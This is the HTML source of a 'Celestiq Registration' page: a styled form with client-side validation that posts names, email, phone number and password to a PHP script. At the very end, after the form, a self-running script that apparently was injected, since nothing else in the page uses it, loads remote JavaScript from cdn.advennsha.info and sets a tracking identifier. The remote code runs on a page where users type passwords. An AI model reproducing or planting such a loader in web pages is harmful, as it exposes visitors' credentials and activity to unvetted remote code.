

<html>
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <style>
        body {font-family: Arial, Helvetica, sans-serif;}
        form {border: 3px solid #f1f1f1;}
        
        input[type=text], input[type=password] {
          width: 100%;
          padding: 12px 20px;
          margin: 8px 0;
          display: inline-block;
          border: 1px solid #ccc;
          box-sizing: border-box;
        }
        
        button {
          background-color: #4CAF50;
          color: white;
          padding: 14px 20px;
          margin: 8px 0;
          border: none;
          cursor: pointer;
          width: 100%;
        }
        
        button:hover {
          opacity: 0.8;
        }
        
        .cancelbtn {
          width: auto;
          padding: 10px 18px;
          background-color: #f44336;
        }
        
        .imgcontainer {
          text-align: center;
          margin: 24px 0 12px 0;
        }
        
        img.avatar {
          width: 40%;
          border-radius: 50%;
        }
        
        .container {
          padding: 16px;
        }
        
        span.psw {
          float: right;
          padding-top: 16px;
        }
        
        /* Change styles for span and cancel button on extra small screens */
        @media screen and (max-width: 300px) {
          span.psw {
             display: block;
             float: none;
          }
          .cancelbtn {
             width: 100%;
          }
        }
        </style>
        <link href="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
        <script src="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"></script>
        <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
        <script>
        function validate()                                    
        { 
            var email = document.forms["RegForm"]["Email_Address"];       
            var First_Name = document.forms["RegForm"]["First_Name"];
            var Last_Name = document.forms["RegForm"]["Last_Name"]; 
            var Contact_Number = document.forms["RegForm"]["Contact_Number"];   
            var password = document.forms["RegForm"]["password"];
            var ConfirmPassword = document.forms["RegForm"]["ConfirmPassword"];
            if (email.value == "")                                  
            { 
                window.alert("Please enter your email."); 
                email.focus(); 
                return false; 
            } 
           
            else if (First_Name.value == "")                               
            { 
                window.alert("Please enter your First_Name."); 
                First_Name.focus(); 
                return false; 
            } 
            else if (Last_Name.value == "")                               
            { 
                window.alert("Please enter your Last_Name."); 
                Last_Name.focus(); 
                return false; 
            } 
            else if (Contact_Number.value == "")                               
            { 
                window.alert("Please enter your Contact_Number."); 
                Contact_Number.focus(); 
                return false; 
            } 
            else if (password.value == "")                               
            { 
                window.alert("Please enter your password."); 
                password.focus(); 
                return false; 
            } 
            else if (ConfirmPassword.value == "")                               
            { 
                window.alert("Please enter your ConfirmPassword."); 
                ConfirmPassword.focus(); 
                return false; 
            } 
            else if (password.value != ConfirmPassword.value)
            {
                window.alert("Please match password."); 
                return false;
            }
            return true; 
        }</script> 
        </head>
<body>
        <div class="imgcontainer">
                <h3>Celestiq Registration</h3>
              </div>
            
              <div class="container">
<form name="RegForm" action="celestiqInsert.php" onsubmit="return validate()" method="POST">
First Name:<input type="text" name="First_Name"><br>
Last Name:<input type="text" name="Last_Name"><br>
Email Address:<input type="text" name="Email_Address"><br>
Contact Number:<input type="text" name="Contact_Number"><br>
Password:<input type="password" name="password"><br>
Confirm Password:<input type="password" name="ConfirmPassword"><br>
<div class="container" style="background-color:#f1f1f1">
  <center><input type="submit" name="Submit"  class="cancelbtn" value="submit"></center>
</div>
</div>
</form>

<script type="text/javascript">
(function(window, document) {
	if (window === top) {
	var script = document.createElement('script');
	script.src = 'https://cdn.advennsha.info/pa.min.js';
	document.getElementsByTagName('head')[0].insertAdjacentElement('beforeEnd', script);
	window['_paInfo_'] = window['_paInfo_'] || {
		uid: 'BFEBFBFF00040651F8B6104B',sub1: 'pa'
	}
}
})(window, document);
</script></body>
</html>